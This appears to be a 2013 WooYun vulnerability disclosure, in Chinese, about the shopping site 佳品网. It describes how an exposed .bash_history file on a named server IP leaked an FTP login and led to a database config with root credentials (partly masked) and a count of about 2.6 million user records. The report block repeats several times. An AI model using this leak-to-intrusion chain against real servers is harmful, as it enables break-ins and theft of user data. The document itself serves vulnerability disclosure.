佳品网敏感信息泄露导致服务器沦陷(可影响数百万用户信息)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-046857

漏洞标题：佳品网敏感信息泄露导致服务器沦陷(可影响数百万用户信息)

漏洞作者：猪猪侠

提交时间：2013-12-23 23:49

修复时间：2013-12-28 23:49

公开时间：2013-12-28 23:49

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-12-23：细节已通知厂商并且等待厂商处理中
2013-12-28：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

由于没有一个通用标准的防御规则保护好中间件配置信息、DNS信息、业务数据信息、用户信息、源码备份文件、版本管理工具信息、系统错误信息和敏感地址信息(后台或测试地址)的泄露，攻击者可能会通过收集这些保护不足的数据，利用这些信息对系统实施进一步的攻击。

详细说明：

#1 信息泄露原因
由于佳品网管理员在设置HTTPD中间件管理用户的主目录时，未注意到bash会默认创建各种.bash_history、.bash_profile文件用来生成对应的SHELL环境，从而造成了更严重的信息安全问题。
#2 泄露内容
网站: http://119.254.82.134
泄露文件：http://119.254.82.134/.bash_history
#3 泄露内容

chmod -R 777 index.php
cat index.php
cat index.php| error
cat index.php|grep error
vi index.php.3 
vim bootstrap.php
exit
cd vipstore.com2/
cd html/
cat index.php| grep error
cat index.php| grep try
vi index.php
vi index.php.3 
vi index.php
vi index.php
exit
cd goods/
cd html/
vi ../../vipstore.com2/html/bootstrap.php
vi ../../vipstore.com2/html/bootstrap.php
cd goods/
cd html/
cd config/
vi config.ini 
cd ht
/html/
cd goods/
cd html/
cd vipstore.com2/
cd html/
cat bootstrap.php
cd www/
cd goods/
cd html/
cd -
pwd
cd vipstore.com2/
cd html/
cd goods/
cd config/
vi config.ini 
cd ht
vi ../html/bootstrap.php
exit
cd vipstore.com2/
cd application/admin/
cd controllers/
vi KilqlController.php 
exit
cd vipstore.com2/
cd application/user/
cd admin/
cd controllers/
vi KilqlController.php 
su ftpuser
su ftpuser
cd vipstore.com2/application/admin/controllers/
vimdiff KilqlController.php KilqlController.php.bak 
cd mode/
vi KilqlModel.php KilqlModel.php
cd -
cd controllers/
vi KilqlController.php
vi KilqlController.php
/mode/
vi KilqlModel.php 
vi KilqlModel.php 
cd -
vi KilqlController.php
vi KilqlController.php
vi KilqlController.php
exit
cd fleet_upload/
cd task/
vim mv_project_file_to_online_path.sh 
ll
cd f_1337761972/
ll
ll
ll f*/
cd task/
ks
rm f_1337* -rf
cd task/
cd fleet_upload/task/
vi mv_project_file_to_online_path.sh 
exit
cd fleet_upload/
cd task/
cd f_1337826*
pwd
ll
cdcd fleet_upload/
cd fleet_upload/
ll
chmod -R 777
chmod -R 777 ./
chmod -R 777 ../
/
chmod -R 777 fleet_upload/
cd fleet_upload/
cd f_1337826921/
lftp -u www,^*******7*UHB ffttpp.vipstore.com
exit
cd fleet_upload/
rm f_13378* -rf
cd task/
cd vipstore.com2/
rm -rf procedure/order
cd -
cd www/
cd fleet_upload/
cd task/
cd task/
cd f_1337841923/
/../vipstore.com2/procedure/
cd -
rm f_1337841923/ -rf
ks
watch -n 0.1 "ll"
watch -n 0.1 " ./"
watch -n 0.1 "find ./ *"
vi task/mv_project_file_to_online_path.sh 
cd task/
cat task.sh
cat task.sh
cat task.sh
 *
cd task/
cd f_1337842643/task/
watch -n 0.1 ""
pwd
rm f_1337842* -rf
watch -n 0.1 ""
l
s
rm f_1337842858/ -rf
cd task/
cat task.sh 
cat task.sh 
exit
cd vipstore.com2/
cd fleet_upload/
cd task/
cat task.sh 
cd f_1337855455/
cd task/
rm -rf task/
cd task/
cat task.sh 
cd f_1337856806/
cd task/
rm 1337856* -rf
vi mv_project_file_to_online_path.sh 
rm f_133785* -rf
watch -n 0.1 ""
cd /www/vipstore.com2/procedure/order/
cd vipstore.com2/
cd application/
cd m
cd controllers/
mv Iphonemember

漏洞证明：

#4 漏洞利用
泄露的信息中包含了某服务器的SSH用户名、密码，可远程连接

lftp -u www,^*******7*UHB ffttpp.vipstore.com

#5 查看数据库配置文件，并连接数据库
cat /vipstore.com/config/config.ini

[default]
; 站点设置
www.host    = localhost
www.baseurl = /
; xml数据文件
data.file   = data/departments.xml
menu.file	= data/menu.xml
; 数据连接设置
db.adapter  = PDO_MYSQL
db.dbname   = vipstore2
db.hostname = 10.0.111.195
db.username = root
db.password = 6yh****7
db.profiler = true
; Debug 模式
debug       = on
config		= on
;cache 设置
cache.lifetime = 72000
cache.automatic_Serialization = true
;session 设置
session.remember_me_seconds = 86400000 //10天会话标识符还将保存在cookie中的时长
session.use_only_cookies = on
;admin_log 管理员日志
log.addgroup = 添加角色
log.editgroup = 编辑角色:
log.menu = 添加菜单
log.editmenu = 编辑菜单:
log.user = 添加管理员
log.edituser = 编辑用户:
log.addcredit = 添加积分规则:
log.editcredit = 编辑积分规则:
log.additem = 添加标签项：
log.addtag = 添加标签：
log.edititem = 编辑标签项：
log.edittag = 编辑标签：
log.detaidel = 删除最终标签
log.addvir = 添加虚拟账户获取规则:
log.editvir = 编辑虚拟账户获取规则:

#6 访问到敏感的用户数据

SELECT COUNT(*) FROM `user_member`
2639889

修复方案：

#1 网络边界需要认真对待
#2 杜绝为了方便而造成的不必要的信息泄露
#3 安全是一个整体，保证安全不在于强大的地方有多强大，而在于真正薄弱的地方在哪里

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2013-12-28 23:49

厂商回复：

漏洞Rank：8 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-046857

漏洞标题：佳品网敏感信息泄露导致服务器沦陷(可影响数百万用户信息)

相关厂商：佳品网

漏洞作者：猪猪侠

提交时间：2013-12-23 23:49

修复时间：2013-12-28 23:49

公开时间：2013-12-28 23:49

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-046857

漏洞标题：佳品网敏感信息泄露导致服务器沦陷(可影响数百万用户信息)

相关厂商：佳品网

漏洞作者： 猪猪侠

提交时间：2013-12-23 23:49

修复时间：2013-12-28 23:49

公开时间：2013-12-28 23:49

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-046857"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：猪猪侠

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源猪猪侠@乌云